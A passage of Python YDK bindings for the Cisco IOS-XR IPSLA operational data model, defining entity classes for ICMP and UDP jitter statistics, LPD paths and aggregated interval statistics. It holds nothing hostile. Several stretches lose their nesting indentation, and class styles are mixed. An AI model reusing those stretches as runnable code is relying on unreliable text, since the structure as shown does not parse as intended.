self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
# Single enumeration leaf identifying the operation type.
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
# Instantiate and register both child containers up front.
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
"""Delegate to ydk's generic attribute handling, restricted to this node's leaf names."""
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
    """
    icmp path jitter stats.

    Per-hop statistics for an ICMP path-jitter probe: the source,
    destination and hop IPv4 addresses (dotted-quad strings), the echo
    interval in milliseconds, round-trip-time aggregates (count, current,
    min, max, sum and 64-bit sum of squares), packet counters (replies
    received, lost, out of sequence, discarded samples, data corruption,
    dropped), the hop's jitter value, and positive/negative jitter
    aggregates (sum, 64-bit sum of squares, min, max, count).
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats, self).__init__()

        self.yang_name = "icmp-path-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Pure leaf container: no child containers and no child lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])

        # (python name, YANG type) per leaf, in YANG order; the YANG
        # identifier is the Python name with '_' mapped to '-'.
        leaf_specs = [
            ('source_address', YType.str),
            ('dest_address', YType.str),
            ('hop_address', YType.str),
            ('packet_interval', YType.uint32),
            ('response_time_count', YType.uint32),
            ('response_time', YType.uint32),
            ('min_response_time', YType.uint32),
            ('max_response_time', YType.uint32),
            ('sum_response_time', YType.uint32),
            ('sum2_response_time', YType.uint64),
            ('packet_count', YType.uint32),
            ('packet_loss_count', YType.uint32),
            ('out_of_sequence_count', YType.uint32),
            ('discarded_sample_count', YType.uint32),
            ('verify_errors_count', YType.uint32),
            ('dropped_error_count', YType.uint32),
            ('jitter', YType.uint32),
            ('pos_jitter_sum', YType.uint32),
            ('pos_jitter_sum2', YType.uint64),
            ('pos_jitter_min', YType.uint32),
            ('pos_jitter_max', YType.uint32),
            ('pos_jitter_count', YType.uint32),
            ('neg_jitter_sum', YType.uint32),
            ('neg_jitter_min', YType.uint32),
            ('neg_jitter_max', YType.uint32),
            ('neg_jitter_sum2', YType.uint64),
            ('neg_jitter_count', YType.uint32),
        ]
        self._leafs = OrderedDict(
            (name, YLeaf(ytype, name.replace('_', '-')))
            for name, ytype in leaf_specs)

        # Start every leaf out unset; the setattr calls funnel through
        # __setattr__ just like explicit ``self.x = None`` lines would.
        for name, _ in leaf_specs:
            setattr(self, name, None)

        # Fixed relative XPath segment for this container.
        self._segment_path = lambda: "icmp-path-jitter-stats"

    def __setattr__(self, name, value):
        """Delegate to ydk's generic attribute handling, restricted to this node's leaf names."""
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
    """
    udp jitter stats

    Read-only operational counters for a UDP jitter probe:

    * RFC 1889 moving-average jitter per direction (``jitter_in``,
      ``jitter_out``)
    * packet accounting: loss in the source-to-destination (SD) and
      destination-to-source (DS) directions, out-of-sequence,
      missing-in-action, skipped, late arrivals, invalid timestamps,
      internal errors and busies
    * positive/negative jitter sum (milliseconds), sum of squares,
      minimum, maximum and count, for both SD and DS directions
    * one-way jitter min/max/sum/sum-of-squares per direction, plus
      the number of probe/probe-response pairs used
      (``one_way_count``)

    Every leaf is a uint32 except the ``*sum2`` (sum of squares)
    leafs, which are uint64.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    # Leaf python-names in YANG order.  Each leaf's YANG identifier is
    # the python name with underscores replaced by hyphens; every leaf
    # is uint32 except those ending in 'sum2', which are uint64.
    _LEAF_NAMES = (
        'jitter_in',
        'jitter_out',
        'packet_loss_sd',
        'packet_loss_ds',
        'packet_out_of_sequence',
        'packet_mia',
        'packet_skipped',
        'packet_late_arrivals',
        'packet_invalid_tstamp',
        'internal_errors_count',
        'busies_count',
        'positive_sd_sum',
        'positive_sd_sum2',
        'positive_sd_min',
        'positive_sd_max',
        'positive_sd_count',
        'negative_sd_sum',
        'negative_sd_sum2',
        'negative_sd_min',
        'negative_sd_max',
        'negative_sd_count',
        'positive_ds_sum',
        'positive_ds_sum2',
        'positive_ds_min',
        'positive_ds_max',
        'positive_ds_count',
        'negative_ds_sum',
        'negative_ds_sum2',
        'negative_ds_min',
        'negative_ds_max',
        'negative_ds_count',
        'one_way_count',
        'one_way_sd_min',
        'one_way_sd_max',
        'one_way_sd_sum',
        'one_way_sd_sum2',
        'one_way_ds_min',
        'one_way_ds_max',
        'one_way_ds_sum',
        'one_way_ds_sum2',
    )

    def __init__(self):
        owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                 Latest.Hops.Hop.SpecificStats.UdpJitterStats)
        super(owner, self).__init__()
        self.yang_name = "udp-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Build the leaf table from the name list instead of spelling
        # out all forty YLeaf constructions by hand.
        self._leafs = OrderedDict(
            (name,
             YLeaf(YType.uint64 if name.endswith('sum2') else YType.uint32,
                   name.replace('_', '-')))
            for name in self._LEAF_NAMES)
        # Leaf values start out unset; assignment goes through
        # __setattr__ and therefore through ydk validation.
        for name in self._LEAF_NAMES:
            setattr(self, name, None)
        self._segment_path = lambda: "udp-jitter-stats"

    def __setattr__(self, name, value):
        """Route every attribute write through ydk's validating hook."""
        owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                 Latest.Hops.Hop.SpecificStats.UdpJitterStats)
        self._perform_setattr(owner, list(self._LEAF_NAMES), name, value)
class LpdPaths(Entity):
    """
    List of latest LPD paths: ``lpd_path`` is a YList holding the
    latest per-path statistics of an MPLS LSP group operation.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                 Latest.LpdPaths)
        super(owner, self).__init__()
        self.yang_name = "lpd-paths"
        self.yang_parent_name = "latest"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict(
            [("lpd-path", ("lpd_path", owner.LpdPath))])
        self._leafs = OrderedDict()
        self.lpd_path = YList(self)
        self._segment_path = lambda: "lpd-paths"

    def __setattr__(self, name, value):
        # The list container itself carries no leafs.
        owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                 Latest.LpdPaths)
        self._perform_setattr(owner, [], name, value)

    class LpdPath(Entity):
        """
        Latest statistics of one path of an MPLS LSP group operation,
        keyed by ``path_index`` (int32).  Carries the path identifier
        container (``path_id``) and the path return code
        (``return_code``, an IpslaRetCode enumeration).
        """

        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                     Latest.LpdPaths.LpdPath)
            super(owner, self).__init__()
            self.yang_name = "lpd-path"
            self.yang_parent_name = "lpd-paths"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['path_index']
            self._child_container_classes = OrderedDict(
                [("path-id", ("path_id", owner.PathId))])
            self._child_list_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('path_index', YLeaf(YType.int32, 'path-index')),
                ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ])
            self.path_index = None
            self.return_code = None
            self.path_id = owner.PathId()
            self.path_id.parent = self
            self._children_name_map["path_id"] = "path-id"
            self._children_yang_names.add("path-id")
            # The list key is embedded in the segment path.
            self._segment_path = lambda: (
                "lpd-path" + "[path-index='" + str(self.path_index) + "']")

        def __setattr__(self, name, value):
            owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                     Latest.LpdPaths.LpdPath)
            self._perform_setattr(
                owner, ['path_index', 'return_code'], name, value)

        class PathId(Entity):
            """
            LPD path identifier: LSP-selector and next-hop IPv4
            addresses (dotted-quad strings), the output interface
            name, and the downstream MPLS label stack
            (``downstream_label``, a leaf-list of uint32).
            """

            _prefix = 'man-ipsla-oper'
            _revision = '2015-11-09'

            def __init__(self):
                owner = (Ipsla.OperationData.Operations.Operation.
                         Statistics.Latest.LpdPaths.LpdPath.PathId)
                super(owner, self).__init__()
                self.yang_name = "path-id"
                self.yang_parent_name = "lpd-path"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_container_classes = OrderedDict([])
                self._child_list_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
                    ('output_interface',
                     YLeaf(YType.str, 'output-interface')),
                    ('nexthop_address',
                     YLeaf(YType.str, 'nexthop-address')),
                    ('downstream_label',
                     YLeafList(YType.uint32, 'downstream-label')),
                ])
                self.lsp_selector = None
                self.output_interface = None
                self.nexthop_address = None
                # Leaf-list: starts as an empty list, not None.
                self.downstream_label = []
                self._segment_path = lambda: "path-id"

            def __setattr__(self, name, value):
                owner = (Ipsla.OperationData.Operations.Operation.
                         Statistics.Latest.LpdPaths.LpdPath.PathId)
                self._perform_setattr(
                    owner,
                    ['lsp_selector', 'output_interface',
                     'nexthop_address', 'downstream_label'],
                    name, value)
class Aggregated(Entity):
"""
Statistics aggregated for data collected
over time intervals
.. attribute:: enhanced_intervals
Table of statistics aggregated over enhanced intervals
**type**\: :py:class:`EnhancedIntervals <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals>`
.. attribute:: hours
Table of statistics aggregated over 1\-hour intervals
**type**\: :py:class:`Hours <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'aggregated' container and attach its two child containers."""
    owner = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated
    super(owner, self).__init__()
    self.yang_name = "aggregated"
    self.yang_parent_name = "statistics"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([
        ("enhanced-intervals",
         ("enhanced_intervals", owner.EnhancedIntervals)),
        ("hours", ("hours", owner.Hours)),
    ])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()
    # Child containers are instantiated eagerly and parented here.
    self.enhanced_intervals = owner.EnhancedIntervals()
    self.enhanced_intervals.parent = self
    self._children_name_map["enhanced_intervals"] = "enhanced-intervals"
    self._children_yang_names.add("enhanced-intervals")
    self.hours = owner.Hours()
    self.hours.parent = self
    self._children_name_map["hours"] = "hours"
    self._children_yang_names.add("hours")
    self._segment_path = lambda: "aggregated"
class EnhancedIntervals(Entity):
"""
Table of statistics aggregated over
enhanced intervals
.. attribute:: enhanced_interval
Statistics aggregated over an interval specified in seconds. Specified interval must be a multiple of the operation frequency
**type**\: list of :py:class:`EnhancedInterval <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'enhanced-intervals' container holding the interval list."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals)
    super(owner, self).__init__()
    self.yang_name = "enhanced-intervals"
    self.yang_parent_name = "aggregated"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    self._child_list_classes = OrderedDict(
        [("enhanced-interval",
          ("enhanced_interval", owner.EnhancedInterval))])
    self._leafs = OrderedDict()
    self.enhanced_interval = YList(self)
    self._segment_path = lambda: "enhanced-intervals"
def __setattr__(self, name, value):
    """Route attribute writes through ydk validation (no leafs here)."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals)
    self._perform_setattr(owner, [], name, value)
class EnhancedInterval(Entity):
"""
Statistics aggregated over an interval
specified in seconds. Specified interval
must be a multiple of the operation
frequency
.. attribute:: enhanced_interval (key)
Enhanced Interval in seconds
**type**\: int
**range:** \-2147483648..2147483647
**units**\: second
.. attribute:: start_times
Table of start times for the intervals
**type**\: :py:class:`StartTimes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build one 'enhanced-interval' list entry, keyed by the interval length."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval)
    super(owner, self).__init__()
    self.yang_name = "enhanced-interval"
    self.yang_parent_name = "enhanced-intervals"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['enhanced_interval']
    self._child_container_classes = OrderedDict(
        [("start-times", ("start_times", owner.StartTimes))])
    self._child_list_classes = OrderedDict([])
    # Single key leaf: the interval length in seconds (int32).
    self._leafs = OrderedDict([
        ('enhanced_interval', YLeaf(YType.int32, 'enhanced-interval')),
    ])
    self.enhanced_interval = None
    self.start_times = owner.StartTimes()
    self.start_times.parent = self
    self._children_name_map["start_times"] = "start-times"
    self._children_yang_names.add("start-times")
    # The list key is embedded in the segment path.
    self._segment_path = lambda: (
        "enhanced-interval" + "[enhanced-interval='"
        + str(self.enhanced_interval) + "']")
def __setattr__(self, name, value):
    """Route attribute writes through ydk validation."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval)
    self._perform_setattr(owner, ['enhanced_interval'], name, value)
class StartTimes(Entity):
"""
Table of start times for the intervals
.. attribute:: start_time
Statistics aggregated over an enhanced interval which starts at a specific time
**type**\: list of :py:class:`StartTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'start-times' container holding the start-time list."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes)
    super(owner, self).__init__()
    self.yang_name = "start-times"
    self.yang_parent_name = "enhanced-interval"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([])
    self._child_list_classes = OrderedDict(
        [("start-time", ("start_time", owner.StartTime))])
    self._leafs = OrderedDict()
    self.start_time = YList(self)
    self._segment_path = lambda: "start-times"
def __setattr__(self, name, value):
    """Route attribute writes through ydk validation (no leafs here)."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes)
    self._perform_setattr(owner, [], name, value)
class StartTime(Entity):
"""
Statistics aggregated over an enhanced
interval which starts at a specific time
.. attribute:: interval_start_time (key)
Interval Start Time
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build one 'start-time' list entry, keyed by the interval start time."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.
             StartTime)
    super(owner, self).__init__()
    self.yang_name = "start-time"
    self.yang_parent_name = "start-times"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['interval_start_time']
    self._child_container_classes = OrderedDict([
        ("common-stats", ("common_stats", owner.CommonStats)),
        ("specific-stats", ("specific_stats", owner.SpecificStats)),
    ])
    self._child_list_classes = OrderedDict([])
    # Single key leaf: the interval start timestamp string.
    self._leafs = OrderedDict([
        ('interval_start_time', YLeaf(YType.str, 'interval-start-time')),
    ])
    self.interval_start_time = None
    self.common_stats = owner.CommonStats()
    self.common_stats.parent = self
    self._children_name_map["common_stats"] = "common-stats"
    self._children_yang_names.add("common-stats")
    self.specific_stats = owner.SpecificStats()
    self.specific_stats.parent = self
    self._children_name_map["specific_stats"] = "specific-stats"
    self._children_yang_names.add("specific-stats")
    # The list key is embedded in the segment path.
    self._segment_path = lambda: (
        "start-time" + "[interval-start-time='"
        + str(self.interval_start_time) + "']")
def __setattr__(self, name, value):
    """Route attribute writes through ydk validation."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.
             StartTime)
    self._perform_setattr(owner, ['interval_start_time'], name, value)
class CommonStats(Entity):
    """
    Common Stats: aggregate statistics shared by all operation types
    for one interval — operation time (uint64), return code
    (IpslaRetCode enumeration), RTT sample count / value / min / max /
    sum / sum-of-squares, and per-return-code update counters (ok,
    disconnect, timeout, busy, no-connection, dropped, internal
    error, sequence error, verify error — all uint32).
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    # (python_name, YType) in YANG order.  The YANG identifier of
    # each leaf is the python name with underscores replaced by
    # hyphens.
    _LEAF_SPECS = (
        ('operation_time', YType.uint64),
        ('return_code', YType.enumeration),
        ('response_time_count', YType.uint32),
        ('response_time', YType.uint32),
        ('min_response_time', YType.uint32),
        ('max_response_time', YType.uint32),
        ('sum_response_time', YType.uint32),
        ('sum2_response_time', YType.uint64),
        ('update_count', YType.uint32),
        ('ok_count', YType.uint32),
        ('disconnect_count', YType.uint32),
        ('timeout_count', YType.uint32),
        ('busy_count', YType.uint32),
        ('no_connection_count', YType.uint32),
        ('dropped_count', YType.uint32),
        ('internal_error_count', YType.uint32),
        ('sequence_error_count', YType.uint32),
        ('verify_error_count', YType.uint32),
    )

    def __init__(self):
        owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                 Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.
                 StartTime.CommonStats)
        super(owner, self).__init__()
        self.yang_name = "common-stats"
        self.yang_parent_name = "start-time"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Build the leaf table from the spec tuple instead of spelling
        # out each YLeaf construction by hand.
        self._leafs = OrderedDict(
            (py_name, YLeaf(ytype, py_name.replace('_', '-')))
            for py_name, ytype in self._LEAF_SPECS)
        # Leaf values start out unset; assignment goes through
        # __setattr__ and therefore through ydk validation.
        for py_name, _ in self._LEAF_SPECS:
            setattr(self, py_name, None)
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        """Route every attribute write through ydk's validating hook."""
        owner = (Ipsla.OperationData.Operations.Operation.Statistics.
                 Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.
                 StartTime.CommonStats)
        self._perform_setattr(
            owner, [py_name for py_name, _ in self._LEAF_SPECS],
            name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'specific-stats' union container and its per-type children."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.
             StartTime.SpecificStats)
    super(owner, self).__init__()
    self.yang_name = "specific-stats"
    self.yang_parent_name = "start-time"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([
        ("icmp-path-jitter-stats",
         ("icmp_path_jitter_stats", owner.IcmpPathJitterStats)),
        ("udp-jitter-stats", ("udp_jitter_stats", owner.UdpJitterStats)),
    ])
    self._child_list_classes = OrderedDict([])
    # Discriminator leaf telling which child container applies.
    self._leafs = OrderedDict([
        ('op_type', YLeaf(YType.enumeration, 'op-type')),
    ])
    self.op_type = None
    self.icmp_path_jitter_stats = owner.IcmpPathJitterStats()
    self.icmp_path_jitter_stats.parent = self
    self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
    self._children_yang_names.add("icmp-path-jitter-stats")
    self.udp_jitter_stats = owner.UdpJitterStats()
    self.udp_jitter_stats.parent = self
    self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
    self._children_yang_names.add("udp-jitter-stats")
    self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
    """Route attribute writes through ydk validation."""
    owner = (Ipsla.OperationData.Operations.Operation.Statistics.
             Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.
             StartTime.SpecificStats)
    self._perform_setattr(owner, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
    """
    icmp path jitter stats
    .. attribute:: source_address
    IP Address of the source
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    .. attribute:: dest_address
    IP Address of the destination
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    .. attribute:: hop_address
    IP address of the hop in the path
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    .. attribute:: packet_interval
    Interval between echos in ms
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: response_time_count
    Number of RTT samples used for the statistics
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: response_time
    RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: min_response_time
    Minimum RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: max_response_time
    Maximum RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sum_response_time
    Sum of RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sum2_response_time
    Sum of RTT^2
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: packet_count
    Number of Echo replies received
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: packet_loss_count
    Number of packets lost
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: out_of_sequence_count
    Number of out of sequence packets
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: discarded_sample_count
    Number of discarded samples
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: verify_errors_count
    Number of packets with data corruption
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: dropped_error_count
    Number of packets dropped
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: jitter
    Jitter value for this node in the path
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: pos_jitter_sum
    Sum of positive jitter value
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: pos_jitter_sum2
    Sum of squares of positive jitter values
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: pos_jitter_min
    Minimum positive jitter value
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: pos_jitter_max
    Maximum positive jitter value
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: pos_jitter_count
    Number of positive jitter values
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: neg_jitter_sum
    Sum of negative jitter values
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: neg_jitter_min
    Minimum negative jitter value
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: neg_jitter_max
    Maximum negative jitter value
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: neg_jitter_sum2
    Sum of squares of negative jitter values
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: neg_jitter_count
    Number of negative jitter values
    **type**\: int
    **range:** 0..4294967295
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'
    def __init__(self):
        """Register the icmp-path-jitter-stats leafs and initialize them unset."""
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats, self).__init__()
        # YANG node name and enclosing container name.
        self.yang_name = "icmp-path-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # This container holds only leafs — no child containers or lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf bindings: python attribute -> YLeaf(YANG type, YANG leaf name).
        # Order mirrors the YANG model; sum-of-squares leafs are uint64.
        self._leafs = OrderedDict([
            ('source_address', YLeaf(YType.str, 'source-address')),
            ('dest_address', YLeaf(YType.str, 'dest-address')),
            ('hop_address', YLeaf(YType.str, 'hop-address')),
            ('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('packet_count', YLeaf(YType.uint32, 'packet-count')),
            ('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
            ('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
            ('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
            ('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
            ('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
            ('jitter', YLeaf(YType.uint32, 'jitter')),
            ('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
            ('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
            ('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
            ('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
            ('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
            ('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
            ('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
